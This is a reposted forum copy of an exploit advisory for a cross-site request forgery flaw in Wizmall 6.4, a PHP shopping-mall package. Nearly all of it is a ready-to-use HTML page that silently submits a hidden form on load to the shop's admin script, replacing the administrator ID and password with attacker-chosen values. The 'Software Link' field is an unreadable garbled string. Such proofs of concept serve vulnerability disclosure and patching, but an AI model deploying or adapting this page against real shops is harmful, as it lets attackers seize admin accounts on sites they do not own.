-
-
[转帖]wizmall 6.4 CSRF Vulnerabilities
-
发表于:
2010-8-11 12:20
1845
-
[转帖]wizmall 6.4 CSRF Vulnerabilities
# Exploit Title: wizmall 6.4 CSRF Vulnerabilities
# Date: 08/10/2010
# Author: pyw1414 <i2SEC>
# Software Link:
2efK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4Z5L8%4m8Q4x3X3c8%4K9i4A6Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8$3q4J5k6q4)9J5c8X3#2S2K9h3&6Q4x3V1k6$3K9h3g2%4i4K6u0r3M7X3!0G2N6q4)9J5c8Y4N6A6P5X3#2S2L8r3H3H3x3g2)9J5c8U0p5#2z5g2)9J5c8U0m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
# Version: 6.4 UTF-8 For php
# Tested on: XP SP3
-=[ CSRF Exploit - Change Admin ID/PW ]=-
<html>
<head>
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
<!--- Edit these --->
<input type="hidden" name="ID" value="i2sec" />
<input type="hidden" name="PASS" value="test1234" />
<input type="hidden" name="PASS1" value="test1234" />
<!--- Do not edit below --->
<input type="hidden" name="menushow" value="menu1" />
<input type="hidden" name="theme" value="basicconfig/basic_info2" />
<input type="hidden" name="action" value="admin_save" />
<input type="hidden" name="ADMIN_NAME" value="pyw1414" />
<input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />
<input type="hidden" name="ADMIN_TITLE_E" value="" />
<input type="hidden" name="COMPANY_DOMAIN" value="" />
<input type="hidden" name="str_watermark" value="" />
<input type="hidden" name="img_watermark" value="" />
<input type="hidden" name="HOME_URL" value="" />
<input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />
<input type="hidden" name="ADMIN_TEL" value="" />
<input type="hidden" name="COMPANY_NAME" value="i2Sec" />
<input type="hidden" name="PRESIDENT" value="" />
<input type="hidden" name="COMPANY_NUM" value="" />
<input type="hidden" name="COMPLICENCE_NUM" value="" />
<input type="hidden" name="CUSTOMER_TEL" value="" />
<input type="hidden" name="CUSTOMER_FAX" value="" />
<input type="hidden" name="COMPANY_ADD" value="" />
<input type="hidden" name="COMPLICENCE_NUM" value="" />
<input type="hidden" name="MART_BASEDIR" value="" />
<input type="hidden" name="SYSTEM_BASEDIR" value="" />
<input type="hidden" name="smsModule" value="ANYSMS" />
<input type="hidden" name="sms_id" value="" />
<input type="hidden" name="sms_pwd" value="" />
</form>
</body>
</html>
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
